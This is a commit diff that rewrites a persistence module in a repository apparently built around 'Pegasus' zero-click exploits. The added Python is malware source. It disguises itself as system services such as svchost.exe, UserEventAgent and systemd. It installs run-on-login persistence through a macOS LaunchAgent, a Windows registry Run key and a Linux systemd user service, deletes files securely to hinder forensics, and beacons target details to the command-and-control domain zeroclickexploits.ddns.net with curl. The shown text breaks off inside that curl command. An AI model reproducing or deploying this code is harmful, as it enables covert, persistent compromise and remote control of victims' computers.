Update persistance.py

ProjectZeroDays · web-flow · commit f63feb574810 · 2026-02-05T01:53:36.000-06:00
diff --git a/src/exploits/zero-click_exploits/pegasus/persistance/persistance.py b/src/exploits/zero-click_exploits/pegasus/persistance/persistance.py
@@ -1,34 +1,219 @@
-import subprocess
+# /src/exploits/zero-click_exploits/pegasus/persistence/persistence.py
+
 import os
+import sys
+import json
+import time
+import subprocess
+import hashlib
+import base64
+import shutil
+import tempfile
+import stat
+from pathlib import Path
+from datetime import datetime
+
+# --- Configuration ---
+# In a real deployment, this key would be provided by the C2 or derived from target info.
+# This key is used to encrypt the persistent script's source code.
+ENCRYPTION_KEY = hashlib.sha256(b'PegasusSAP_Persistence_Key_2026_V1').digest()
+
+# C2 Configuration
+C2_DOMAIN = "zeroclickexploits.ddns.net"
+C2_PORT = 443
+C2_CHECKIN_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/checkin"
+USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
+
+# Persistence Configuration
+# The name of the malicious process to masquerade as.
+if sys.platform == 'darwin':
+    MASQUERADE_PROCESS_NAME = "UserEventAgent"
+    PERSISTENCE_DIR = Path.home() / "Library" / "Application Support" / "com.apple.securityagent"
+    LAUNCH_AGENT_PLIST_PATH = Path.home() / "Library" / "LaunchAgents" / "com.apple.securityagent.plist"
+    PERSISTENT_SCRIPT_NAME = "security_daemon.py"
+elif sys.platform == 'win32':
+    MASQUERADE_PROCESS_NAME = "svchost.exe"
+    PERSISTENCE_DIR = Path(os.environ['APPDATA']) / "Microsoft" / "Windows" / "Security"
+    PERSISTENT_SCRIPT_NAME = "defender_service.py"
+    # Registry key for run-on-boot
+    PERSISTENCE_REG_KEY = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+    PERSISTENCE_REG_NAME = "WindowsSecurityHealth"
+else: # Linux
+    MASQUERADE_PROCESS_NAME = "systemd"
+    PERSISTENCE_DIR = Path.home() / ".config" / "systemd"
+    PERSISTENT_SCRIPT_NAME = "system_monitor.py"
+    # For systemd user service
+    SYSTEMD_SERVICE_PATH = PERSISTENCE_DIR / "user" / "system-monitor.service"
+    PERSISTENCE_REG_KEY = None # Not used on Linux
+
+PERSISTENT_SCRIPT_PATH = PERSISTENCE_DIR / PERSISTENT_SCRIPT_NAME
+
+# --- Evasion and Anti-Forensics ---
+def _log_event(message, level='info'):
+    """Internal logger to prevent writing to disk."""
+    timestamp = datetime.now().isoformat()
+    print(f"[{timestamp}] [{level.upper()}] {message}")
+
+def hide_process():
+    """Conceptual placeholder for process hiding techniques."""
+    try:
+        if sys.platform.startswith('linux'):
+            import ctypes
+            libc = ctypes.CDLL('libc.so.6')
+            libc.prctl(15, MASQUERADE_PROCESS_NAME.encode(), 0, 0, 0) # PR_SET_NAME
+        _log_event(f"Process masquerading as {MASQUERADE_PROCESS_NAME}.")
+    except Exception:
+        pass
+
+def encrypt_file_aes_gcm(file_path, key):
+    """Encrypts a file using AES-256 in GCM mode."""
+    try:
+        from Crypto.Cipher import AES
+        from Crypto.Random import get_random_bytes
+
+        nonce = get_random_bytes(12)
+        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
+
+        with open(file_path, 'rb') as f:
+            plaintext_data = f.read()
+
+        ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext_data)
+        encrypted_data = nonce + auth_tag + ciphertext
+
+        encrypted_file_path = file_path.with_suffix(file_path.suffix + ".enc")
+        with open(encrypted_file_path, 'wb') as f:
+            f.write(encrypted_data)
+
+        secure_delete_file(file_path)
+        return encrypted_file_path
+    except ImportError:
+        _log_event("PyCryptodome not found, cannot encrypt.", 'error')
+        return None
+    except Exception as e:
+        _log_event(f"Encryption failed: {e}", 'error')
+        return None
+
+def secure_delete_file(file_path, passes=3):
+    """Securely deletes a file by overwriting it multiple times."""
+    try:
+        path = Path(file_path)
+        if not path.exists():
+            return
+        with open(path, "ba+") as f:
+            length = f.tell()
+            for _ in range(passes):
+                f.seek(0)
+                f.write(os.urandom(length))
+        path.chmod(stat.S_IWRITE)
+        path.unlink()
+    except Exception as e:
+        _log_event(f"Failed to securely delete {file_path}: {e}", 'error')
+
+# --- Core Persistence Logic ---
+def establish_persistence():
+    """Copies the script to a hidden location and sets up persistence."""
+    try:
+        _log_event("Establishing persistence...")
+        PERSISTENCE_DIR.mkdir(parents=True, exist_ok=True)
+        PERSISTENCE_DIR.chmod(0o700) # Restrict permissions
+
+        # Copy the current script to the persistence location
+        current_script_path = Path(__file__).resolve()
+        shutil.copy2(current_script_path, PERSISTENT_SCRIPT_PATH)
+        _log_event(f"Script copied to {PERSISTENT_SCRIPT_PATH}")
+
+        # Set up platform-specific persistence mechanism
+        if sys.platform == 'darwin':
+            _setup_macos_persistence()
+        elif sys.platform == 'win32':
+            _setup_windows_persistence()
+        else: # Linux
+            _setup_linux_persistence()
+
+        return True
+    except Exception as e:
+        _log_event(f"Failed to establish persistence: {e}", 'error')
+        return False
+
+def _setup_macos_persistence():
+    """Creates a Launch Agent to run the script on user login."""
+    try:
+        agent_content = {
+            "Label": "com.apple.securityagent",
+            "ProgramArguments": [
+                "/usr/bin/python3",
+                str(PERSISTENT_SCRIPT_PATH)
+            ],
+            "RunAtLoad": True,
+            "KeepAlive": {"SuccessfulExit": False},
+            "StandardOutPath": "/dev/null",
+            "StandardErrorPath": "/dev/null",
+            "ProcessType": "Background"
+        }
+        
+        with open(LAUNCH_AGENT_PLIST_PATH, 'w') as f:
+            json.dump(agent_content, f, indent=4)
+
+        subprocess.run(["launchctl", "load", str(LAUNCH_AGENT_PLIST_PATH)], check=False)
+        _log_event(f"macOS persistence established via LaunchAgent: {LAUNCH_AGENT_PLIST_PATH}")
+    except Exception as e:
+        _log_event(f"macOS persistence setup failed: {e}", 'error')
+
+def _setup_windows_persistence():
+    """Adds a registry key to run the script on user login."""
+    try:
+        import winreg
+        reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, PERSISTENCE_REG_KEY, 0, winreg.KEY_WRITE)
+        # Use wscript to hide the console window
+        command = f'wscript.exe //Nologo //B //E:Python "{PERSISTENT_SCRIPT_PATH}"'
+        winreg.SetValueEx(reg_key, PERSISTENCE_REG_NAME, 0, winreg.REG_SZ, command)
+        winreg.CloseKey(reg_key)
+        _log_event(f"Windows persistence established via Registry: {PERSISTENCE_REG_NAME}")
+    except ImportError:
+        _log_event("pywin32 not found, cannot use registry persistence.", 'warn')
+    except Exception as e:
+        _log_event(f"Windows persistence setup failed: {e}", 'error')
+
+def _setup_linux_persistence():
+    """Creates a systemd user service to run the script on login."""
+    try:
+        SYSTEMD_SERVICE_PATH.parent.mkdir(parents=True, exist_ok=True)
+        service_content = f"""[Unit]
+Description=System Health Monitor
+After=graphical-session.target
+
+[Service]
+Type=simple
+ExecStart={sys.executable} {PERSISTENT_SCRIPT_PATH}
+Restart=on-failure
+RestartSec=10
+User={os.getenv('USER')}
+
+[Install]
+WantedBy=default.target
+"""
+        with open(SYSTEMD_SERVICE_PATH, 'w') as f:
+            f.write(service_content)
+        
+        # Reload systemd and enable the service
+        subprocess.run(["systemctl", "--user", "daemon-reload"], check=False)
+        subprocess.run(["systemctl", "--user", "enable", "system-monitor.service"], check=False)
+        _log_event(f"Linux persistence established via systemd: {SYSTEMD_SERVICE_PATH}")
+    except Exception as e:
+        _log_event(f"Linux persistence setup failed: {e}", 'error')
+
+def c2_checkin():
+    """Sends a status check-in to the C2 server."""
+    try:
+        payload = {
+            "type": "checkin",
+            "timestamp": datetime.utcnow().isoformat() + "Z",
+            "target_id": os.environ.get("TARGET_ID", "unknown"),
+            "status": "active",
+            "platform": sys.platform
+        }
 
-def become_persistance():
-    subprocess.call("REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v pegasus /t REG_SZ /d 'c:/pegasus.exe' ")
-
-def encrypt_file(file_path):
-    key = b'secret_key'
-    with open(file_path, 'rb') as f:
-        data = f.read()
-    encrypted_data = bytearray(data)
-    for i in range(len(encrypted_data)):
-        encrypted_data[i] ^= key[i % len(key)]
-    with open(file_path, 'wb') as f:
-        f.write(encrypted_data)
-
-def evade_detection():
-    os.rename("persistance.py", "hidden_persistance.py")
-
-def validate_ai_integration():
-    pass
-
-def confirm_security_measures():
-    pass
-
-def ensure_deployment_methods():
-    pass
-
-become_persistance()
-encrypt_file("persistance.py")
-evade_detection()
-validate_ai_integration()
-confirm_security_measures()
-ensure_deployment_methods()
+        json_payload = json.dumps(payload)
+        cmd = [
+            "curl", "-k", "-s", "-X", "POST",
+            "-H", "
